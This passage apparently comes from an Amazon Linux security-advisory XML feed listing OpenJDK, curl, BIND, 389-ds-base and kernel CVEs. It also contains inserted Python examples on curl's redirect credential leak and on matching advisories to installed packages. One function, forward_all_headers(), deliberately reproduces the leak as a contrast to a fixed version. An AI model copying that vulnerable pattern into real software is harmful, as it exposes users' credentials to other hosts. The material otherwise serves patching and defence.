Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534296:
CVE-2018-2663 OpenJDK: ArrayBlockingQueue deserialization to an inconsistent state (Libraries, 8189284)
CVE-2018-2641:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N).
1534766:
CVE-2018-2641 OpenJDK: GTK library loading use-after-free (AWT, 8185325)
CVE-2018-2637:
It was discovered that the JMX component of OpenJDK failed to properly set the deserialization filter for the SingleEntryRegistry in certain cases. A remote attacker could possibly use this flaw to bypass intended deserialization restrictions.
1534970:
CVE-2018-2637 OpenJDK: SingleEntryRegistry incorrect setup of deserialization filter (JMX, 8186998)
CVE-2018-2634:
The JGSS component of OpenJDK ignores the value of the javax.security.auth.useSubjectCredsOnly property when using HTTP/SPNEGO authentication and always uses global credentials. It was discovered that this could cause global credentials to be unexpectedly used by an untrusted Java application.
1534943:
CVE-2018-2634 OpenJDK: use of global credentials for HTTP/SPNEGO (JGSS, 8186600)
CVE-2018-2633:
It was discovered that the LDAPCertStore class in the JNDI component of OpenJDK failed to securely handle LDAP referrals. An attacker could possibly use this flaw to make it fetch attacker controlled certificate data.
1535036:
CVE-2018-2633 OpenJDK: LDAPCertStore insecure handling of LDAP referrals (JNDI, 8186606)
CVE-2018-2629:
It was discovered that the JGSS component of OpenJDK failed to properly handle GSS context in the native GSS library wrapper in certain cases. A remote attacker could possibly make a Java application using JGSS to use a previously freed context.
1534625:
CVE-2018-2629 OpenJDK: GSS context use-after-free (JGSS, 8186212)
CVE-2018-2618:
It was discovered that the key agreement implementations in the JCE component of OpenJDK did not guarantee sufficient strength of used keys to adequately protect generated shared secret. This could make it easier to break data encryption by attacking key agreement rather than the encryption using the negotiated secret.
1534762:
CVE-2018-2618 OpenJDK: insufficient strength of key agreement (JCE, 8185292)
CVE-2018-2603:
It was discovered that the Libraries component of OpenJDK failed to sufficiently limit the amount of memory allocated when reading DER encoded input. A remote attacker could possibly use this flaw to make a Java application use an excessive amount of memory if it parsed attacker supplied DER encoded input.
1534553:
CVE-2018-2603 OpenJDK: DerValue unbounded memory allocation (Libraries, 8182387)
CVE-2018-2602:
It was discovered that the I18n component of OpenJDK could use an untrusted search path when loading resource bundle classes. A local attacker could possibly use this flaw to execute arbitrary code as another local user by making their Java application load an attacker controlled class file.
1534525:
CVE-2018-2602 OpenJDK: loading of classes from untrusted locations (I18n, 8182601)
CVE-2018-2599:
It was discovered that the DNS client implementation in the JNDI component of OpenJDK did not use random source ports when sending out DNS queries. This could make it easier for a remote attacker to spoof responses to those queries.
1534543:
CVE-2018-2599 OpenJDK: DnsClient missing source port randomization (JNDI, 8182125)
CVE-2018-2588:
It was discovered that the LDAP component of OpenJDK failed to properly encode special characters in user names when adding them to an LDAP search query. A remote attacker could possibly use this flaw to manipulate LDAP queries performed by the LdapLoginModule class.
1534299:
CVE-2018-2588 OpenJDK: LdapLoginModule insufficient username encoding in LDAP query (LDAP, 8178449)
CVE-2018-2582:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 8u152 and 9.0.1; Java SE Embedded: 8u151. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N).
1534768:
CVE-2018-2582 OpenJDK: insufficient validation of the invokeinterface instruction (Hotspot, 8174962)
CVE-2018-2579:
It was discovered that multiple encryption key classes in the Libraries component of OpenJDK did not properly synchronize access to their internal data. This could possibly cause a multi-threaded Java application to apply weak encryption to data because of the use of a key that was zeroed out.
1534298:
CVE-2018-2579 OpenJDK: unsynchronized access to encryption key data (Libraries, 8172525)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2579" title="" id="CVE-2018-2579" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2582" title="" id="CVE-2018-2582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2588" title="" id="CVE-2018-2588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2599" title="" id="CVE-2018-2599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2602" title="" id="CVE-2018-2602" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2603" title="" id="CVE-2018-2603" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2618" title="" id="CVE-2018-2618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2629" title="" id="CVE-2018-2629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2633" title="" id="CVE-2018-2633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2634" title="" id="CVE-2018-2634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2637" title="" id="CVE-2018-2637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2641" title="" id="CVE-2018-2641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2663" title="" id="CVE-2018-2663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2677" title="" id="CVE-2018-2677" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2678" title="" id="CVE-2018-2678" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.161-0.b14.36.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.161-0.b14.36.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-950</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-950: medium priority package update for transmission</title><issued date="2018-02-07 17:54:00" /><updated date="2018-02-08 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5702:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5702" title="" id="CVE-2018-5702" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transmission" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-common" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-common-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-debuginfo-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-cli-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-daemon" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-daemon-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-cli-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission-common" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-common-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission-daemon" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-daemon-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission-debuginfo" version="2.92" release="11.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/transmission-debuginfo-2.92-11.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-951</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-951: important priority package update for curl</title><issued date="2018-02-20 20:57:00" /><updated date="2018-04-05 17:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000007:
libcurl 7.1 through 7.57.0 might accidentally leak authentication data to third parties. When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in the URL in the `Location:` response header value. Sending the same set of headers to subsequent hosts is in particular a problem for applications that pass on custom `Authorization:` headers, as this header often contains privacy-sensitive information or data that could allow others to impersonate the libcurl-using client&#039;s request.
1537125:
CVE-2018-1000007 curl: HTTP authentication leak in redirects
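The leak described for CVE-2018-1000007 above comes down to one policy decision at the moment a redirect is followed. What follows is an added example, not curl's code: forward_all_headers() models the pre-fix behaviour, headers_for_redirect() the hardened one, which keeps credential headers on the origin the caller asked for unless the caller explicitly opts in. The function names, the trust_redirects flag and the example URLs are assumptions, and treating Cookie and Proxy-Authorization like Authorization is this example's choice rather than a statement about curl.

```python
"""Added example (not curl's code): a redirect header policy that does not
leak credentials across origins, the class of bug in CVE-2018-1000007.
forward_all_headers() is the vulnerable behaviour, headers_for_redirect()
the hardened one. Names, the trust_redirects flag and the URLs used below
are assumptions for this example."""
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
# Headers that carry credentials and must not follow a cross-origin redirect.
CREDENTIAL_HEADERS = {"authorization", "proxy-authorization", "cookie"}


def origin(url):
    """(scheme, host, port), with implicit ports made explicit so that
    https://a.example and https://a.example:443 compare as the same origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return scheme, host, port


def forward_all_headers(current_url, location, headers):
    """Pre-fix behaviour: every custom header follows the redirect, wherever
    Location points. Returns (resolved target URL, headers to send)."""
    return urljoin(current_url, location), dict(headers)


def headers_for_redirect(current_url, location, headers, trust_redirects=False):
    """Resolve Location against the current URL and return (target, headers)
    for the follow-up request. Same origin: everything is forwarded.
    Different origin: credential headers are dropped unless the caller
    explicitly trusts redirects (the equivalent of curl's --location-trusted)."""
    target = urljoin(current_url, location)
    if trust_redirects or origin(current_url) == origin(target):
        return target, dict(headers)
    kept = {k: v for k, v in headers.items() if k.lower() not in CREDENTIAL_HEADERS}
    return target, kept


if __name__ == "__main__":
    # Constructed scenario: an API host redirects an authenticated client to another host.
    start = "https://api.example.com/v1/report"
    hdrs = {"Authorization": "Bearer token-abc", "Accept": "application/json"}
    for policy in (forward_all_headers, headers_for_redirect):
        target, sent = policy(start, "https://cdn.example.net/report.json", hdrs)
        print(policy.__name__, target, sorted(sent))
```

The origin comparison deliberately includes the scheme: a redirect from https to http on the same host is still a downgrade that would expose the header on the wire, so the hardened policy strips it there too.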
CVE-2018-1000005:
libcurl 7.49.0 to and including 7.57.0 contains an out-of-bounds read in code handling HTTP/2 trailers. It was reported (https://github.com/curl/curl/pull/2231) that reading an HTTP/2 trailer could mess up future trailers since the stored size was one byte less than required. The problem is that the code that creates HTTP/1-like headers from the HTTP/2 trailer data once appended a string like `:` to the target buffer, while this was recently changed to `: ` (a space was added after the colon) but the following math wasn&#039;t updated correspondingly. When accessed, the data is read out of bounds and causes either a crash or the (too large) data being passed to the client write callback. This could lead to a denial-of-service situation or an information disclosure if someone has a service that echoes back or uses the trailers for something.
1536013:
CVE-2018-1000005 curl: Out-of-bounds read in code handling HTTP/2 trailers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000005" title="" id="CVE-2018-1000005" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000007" title="" id="CVE-2018-1000007" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-14.81.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-14.81.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-14.81.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-14.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-954</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-954: important priority package update for bind</title><issued date="2018-02-20 
21:02:00" /><updated date="2018-02-21 20:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3145:
A use-after-free flaw leading to denial of service was found in the way BIND internally handled cleanup operations on upstream recursion fetch contexts. A remote attacker could potentially use this flaw to make named, acting as a DNSSEC validating resolver, exit unexpectedly with an assertion failure via a specially crafted DNS request.
1534812:
CVE-2017-3145 bind: Improper fetch cleanup sequencing in the resolver can cause named to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3145" title="" id="CVE-2017-3145" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-955</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-955: important priority package update for 389-ds-base</title><issued date="2018-02-20 21:09:00" /><updated date="2018-02-21 20:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15134:
A stack buffer overflow flaw was found in the way 389-ds-base handled certain LDAP search filters. A remote, unauthenticated attacker could potentially use this flaw to make ns-slapd crash via a specially crafted LDAP request, thus resulting in denial of service.
1531573:
CVE-2017-15134 389-ds-base: Remote DoS via search filters in slapi_filter_sprintf in slapd/util.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15134" title="" id="CVE-2017-15134" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="26.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-26.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-956</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-956: important priority package update for kernel</title><issued date="2018-02-20 21:20:00" /><updated date="2018-02-21 20:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5750:
The acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.
1539706:
CVE-2018-5750 kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass
CVE-2018-5344:
A flaw was found in the Linux kernel&#039;s handling of loopback devices. An attacker, who has permissions to set up loopback disks, may create a denial of service or other unspecified actions.
1533909:
CVE-2018-5344 kernel: drivers/block/loop.c mishandles lo_release serialization allowing denial-of-service
CVE-2018-1000028:
Linux kernel versions after commit bdcf0a423ea1 (4.15-rc4+, 4.14.8+, 4.9.76+, 4.4.111+) contain an incorrect access control vulnerability in the NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. The attack appears to be exploitable only when the NFS server exports a filesystem with the &quot;rootsquash&quot; option enabled. This vulnerability appears to have been fixed by commit 1995266727fa.
1540439:
CVE-2018-1000028 kernel: Improper sorting of GIDs in nfsd can lead to incorrect permissions being applied
CVE-2017-5753:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.
1519778:
CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass
CVE-2017-17741:
Linux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.
1527112:
CVE-2017-17741 kernel: kvm: stack-based out-of-bounds read via vmcall instruction
CVE-2017-1000405:
A flaw was found in the patches used to fix the &#039;dirtycow&#039; vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.
1516514:
CVE-2017-1000405 kernel: pmd can become dirty without going through a COW cycle
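An advisory like the one above is only useful once it is matched against what a host actually runs. The following is an added example, not yum's, rpm's or Amazon's code: it parses the updateinfo.xml format this file uses, pulls out each advisory's packages as (name, epoch, version, release, arch), and compares them against rpm -qa output using a simplified reimplementation of rpm's version ordering (no tilde or caret handling, so treat it as an approximation). The sample update element and the rpm -qa lines are constructed for the example and mirror the shape of ALAS-2018-956.

```python
"""Added example, not yum's, rpm's or Amazon's code: read an updateinfo.xml feed
like this one and report installed packages still older than an advisory ships.
rpmvercmp() is a simplified copy of rpm's algorithm (no tilde or caret handling).
The update element and rpm -qa lines below are constructed for this example and
mirror the shape of ALAS-2018-956 above."""
import re
import xml.etree.ElementTree as ET

SEGMENT = re.compile(r"[0-9]+|[a-zA-Z]+")

def rpmvercmp(a, b):
    """rpm-style comparison: split into numeric and alphabetic runs, compare
    numerics numerically and alphas lexically, a numeric run beats an alphabetic
    one, and the string with more runs wins a tie. Returns -1, 0 or 1."""
    sa, sb = SEGMENT.findall(a), SEGMENT.findall(b)
    for x, y in zip(sa, sb):
        xnum, ynum = x.isdigit(), y.isdigit()
        if xnum != ynum:
            return 1 if xnum else -1
        if xnum:
            x, y = int(x), int(y)
        if x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1

def evr_cmp(a, b):
    """Compare (epoch, version, release) string tuples, most significant first."""
    for x, y in zip(a, b):
        c = rpmvercmp(x, y)
        if c != 0:
            return c
    return 0

def parse_updateinfo(root):
    """One dict per update element: id, severity, CVE ids, shipped packages."""
    for upd in root.iter("update"):
        yield {
            "id": upd.findtext("id"),
            "severity": upd.findtext("severity"),
            "cves": [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"],
            "packages": [(p.get("name"), p.get("epoch"), p.get("version"),
                          p.get("release"), p.get("arch")) for p in upd.iter("package")],
        }

def parse_rpm_qa(text):
    """Parse rpm -qa --qf '%{NAME} %{ARCH} %{EPOCH} %{VERSION} %{RELEASE}\\n' output
    into {(name, arch): (epoch, version, release)}; rpm prints (none) for no epoch."""
    installed = {}
    for line in text.splitlines():
        if line.strip():
            name, arch, epoch, ver, rel = line.split()
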